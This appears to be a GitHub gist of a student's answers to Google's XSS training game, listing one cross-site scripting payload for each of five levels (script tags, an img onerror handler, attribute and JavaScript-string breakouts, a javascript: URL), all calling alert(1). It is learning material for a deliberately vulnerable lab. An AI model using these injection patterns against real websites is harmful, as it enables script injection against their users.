Last active
February 8, 2022 14:48
-
-
Save sele-nap/f615eeeef48c20c914f8d51e2414a853 to your computer and use it in GitHub Desktop.
WCS // 3.1 [Basics] Attaques XSS : découvrir
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1st challenge : | |
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script> | |
2nd challenge : | |
<img src=x onerror=alert(1)> | |
3rd challenge : | |
https://xss-game.appspot.com/level3/frame#3' onerror=alert(1)> | |
4th challenge : | |
https://xss-game.appspot.com/level4/frame?timer=')%3Balert(1)%3Bvar b=(' | |
to counter the basic encoding | |
5th challenge : | |
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1) | |
From the main page | |
Put a fake email and click on next to trigger the script |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment